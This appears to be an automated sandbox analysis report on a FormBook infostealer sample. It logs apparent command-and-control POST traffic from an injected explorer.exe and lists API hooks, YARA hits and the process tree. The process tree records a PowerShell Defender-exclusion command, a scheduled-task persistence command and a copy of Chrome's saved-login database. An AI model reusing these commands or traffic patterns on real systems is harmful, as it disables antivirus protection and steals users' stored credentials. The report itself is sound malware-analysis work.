                                                      Jul 20, 2023 11:44:50.752728939 CEST    164    IN    Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID    Source IP      Source Port    Destination IP    Destination Port    Process
                                                      4             192.168.2.5    49715          172.67.215.254    80                  C:\Windows\explorer.exe
                                                      Timestamp    kBytes transferred    Direction    Data
                                                      Jul 20, 2023 11:44:52.809835911 CEST    166    OUT    POST /co63/ HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.saleschildcarriers.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.saleschildcarriers.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:44:52.927716017 CEST    319    IN    HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 20 Jul 2023 09:44:52 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.saleschildcarriers.com/co63/
                                                      Strict-Transport-Security: max-age=31536000
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RZ%2FP2fm9hVmIWbQeWZAhldnh4jXPMp1lrzWOmpv19fPCvYi1S9TXH6ik1HcxJsQ0mVcvariRhQWE8uiw81CkLphlDcaY%2FnTIYdkTBRaEAcqoRSejcUb%2BjEwL%2FYk1V5HqLuZmJc%2FlYZOyUgNCBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a44a20aff18df-FRA
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                      Jul 20, 2023 11:44:52.927746058 CEST | 319 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      5 | 192.168.2.5 | 49716 | 172.67.215.254 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:44:52.832479000 CEST | 179 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.saleschildcarriers.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.saleschildcarriers.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:44:52.989120007 CEST | 320 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 20 Jul 2023 09:44:52 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.saleschildcarriers.com/co63/
                                                      Strict-Transport-Security: max-age=31536000
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MZ1todhg5NFXftCSTWy%2ByfGV1HhCFjBoxb4G4Zd7UwAk%2FvEt2pZBMtWoP8Z%2Bm%2F3Efr4R4f7Z4I0%2B2Id8lQ%2FKvzG5LTGtBWgTdO83lsjrPiUCklufi4RbfCCowPgvC3IRJw1bWPzUlGeIa9vgWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a44a229bf91d1-FRA
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                      Jul 20, 2023 11:44:52.989137888 CEST | 320 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      6 | 192.168.2.5 | 49717 | 152.199.21.175 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:11.299627066 CEST | 323 | OUT | GET /co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.ballthingsez.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:45:11.370085001 CEST | 323 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Date: Thu, 20 Jul 2023 09:45:11 GMT
                                                      Location: https://www.ballthingsez.com/co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH-
                                                      Server: Apache
                                                      Content-Length: 341
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ballthingsez.com/co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&amp;lz=9rXXjDMXIb6HXH-">here</a>.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      7 | 192.168.2.5 | 49718 | 152.199.21.175 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:13.389787912 CEST | 326 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.ballthingsez.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.ballthingsez.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.ballthingsez.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:45:13.437289000 CEST | 365 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Date: Thu, 20 Jul 2023 09:45:13 GMT
                                                      Location: https://www.ballthingsez.com/co63/
                                                      Server: Apache
                                                      Content-Length: 242
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ballthingsez.com/co63/">here</a>.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      8 | 192.168.2.5 | 49719 | 152.199.21.175 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:13.409661055 CEST | 339 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.ballthingsez.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.ballthingsez.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.ballthingsez.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:45:13.489413977 CEST | 481 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Date: Thu, 20 Jul 2023 09:45:13 GMT
                                                      Location: https://www.ballthingsez.com/co63/
                                                      Server: Apache
                                                      Content-Length: 242
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ballthingsez.com/co63/">here</a>.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      9 | 192.168.2.5 | 49720 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:33.908654928 CEST | 482 | OUT | GET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:45:34.316102028 CEST | 482 | IN | HTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:34 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 291
                                                      ETag: "64b05e78-123"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                      Code Manipulations

                                                      Function Name | Hook Type | Active in Processes
                                                      PeekMessageA | INLINE | explorer.exe
                                                      PeekMessageW | INLINE | explorer.exe
                                                      GetMessageW | INLINE | explorer.exe
                                                      GetMessageA | INLINE | explorer.exe

                                                      Function Name | Hook Type | New Data
                                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE4
                                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE4
                                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE4
                                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE4

                                                      Target ID:0
                                                      Start time:11:43:05
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0x980000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:1
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0x800000
                                                      File size:430'592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:2
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:3
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0x800000
                                                      File size:430'592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:4
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:5
                                                      Start time:11:43:16
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp
                                                      Imagebase:0xc30000
                                                      File size:185'856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:6
                                                      Start time:11:43:16
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Target ID:9
                                                      Start time:11:43:18
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0xb50000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 24%, ReversingLabs

                                                      Target ID:10
                                                      Start time:11:43:22
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0xbe0000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                      Target ID:12
                                                      Start time:11:43:32
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp
                                                      Imagebase:0xc30000
                                                      File size:185'856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Target ID:13
                                                      Start time:11:43:32
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Target ID:14
                                                      Start time:11:43:33
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0x4f0000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Target ID:15
                                                      Start time:11:43:35
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff69bc80000
                                                      File size:3'933'184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Target ID:16
                                                      Start time:11:43:48
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                      Imagebase:0x1330000
                                                      File size:61'952 bytes
                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                      Target ID:17
                                                      Start time:11:43:57
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                      Imagebase:0x11d0000
                                                      File size:232'960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Target ID:18
                                                      Start time:11:43:57
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language


                                                        Execution Graph

                                                        Execution Coverage:11.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:115
                                                        Total number of Limit Nodes:6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1254124-1255729 CreateActCtxA 3 1255732-125578c 0->3 4 125572b-1255731 0->4 11 125578e-1255791 3->11 12 125579b-125579f 3->12 4->3 11->12 13 12557a1-12557ad 12->13 14 12557b0 12->14 13->14 16 12557b1 14->16 16->16
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01255719
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: d<nm
                                                        • API String ID: 2289755597-1879898224
                                                        • Opcode ID: cb4abeaea79a9ea3df1077664125dd2e84e3a5d95bba2c3c8060675289b89d60
                                                        • Instruction ID: ca101d4b5be879d9c4f75c610347c3a0cda71c8f1163815cf8b2b74098da0211
                                                        • Opcode Fuzzy Hash: cb4abeaea79a9ea3df1077664125dd2e84e3a5d95bba2c3c8060675289b89d60
                                                        • Instruction Fuzzy Hash: 5B41F170C1071DCFDB24DFA9C984B9EBBB5BF48304F20806AD809AB250DBB46945CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 17 125565c-1255729 CreateActCtxA 19 1255732-125578c 17->19 20 125572b-1255731 17->20 27 125578e-1255791 19->27 28 125579b-125579f 19->28 20->19 27->28 29 12557a1-12557ad 28->29 30 12557b0 28->30 29->30 32 12557b1 30->32 32->32
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01255719
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: d<nm
                                                        • API String ID: 2289755597-1879898224
                                                        • Opcode ID: afa26ea4e049f4495fb3ee2e131d8b226bf4e9f8574aa104e1608dfbd8aaf3bf
                                                        • Instruction ID: ac99ded50441c985b6efda4f09f16cf8091c5a7f7afe1b9815ebf943e61ac1f2
                                                        • Opcode Fuzzy Hash: afa26ea4e049f4495fb3ee2e131d8b226bf4e9f8574aa104e1608dfbd8aaf3bf
                                                        • Instruction Fuzzy Hash: D1410571C1071DCEDB14DFA9C984BDEBBB1BF48304F20816AD409AB251DB756946CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 33 125a7e4-125c08c DuplicateHandle 35 125c095-125c0b2 33->35 36 125c08e-125c094 33->36 36->35
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125BFBE,?,?,?,?,?), ref: 0125C07F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID: d<nm
                                                        • API String ID: 3793708945-1879898224
                                                        • Opcode ID: 2fb37de2a6a5e6ff9d3871cff1b4d950c621d6a5eeea17018e9ed8f28a810c8f
                                                        • Instruction ID: a2999202a01273d1b86fed0e8108766d44c728c7007c42f969fab1881cf8d225
                                                        • Opcode Fuzzy Hash: 2fb37de2a6a5e6ff9d3871cff1b4d950c621d6a5eeea17018e9ed8f28a810c8f
                                                        • Instruction Fuzzy Hash: BF21E3B59103099FDB10CFAAD984AEEBBF8EB48720F14841AE914A7310D374A954DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 39 125bff3 40 125bff8-125c08c DuplicateHandle 39->40 41 125c095-125c0b2 40->41 42 125c08e-125c094 40->42 42->41
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125BFBE,?,?,?,?,?), ref: 0125C07F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID: d<nm
                                                        • API String ID: 3793708945-1879898224
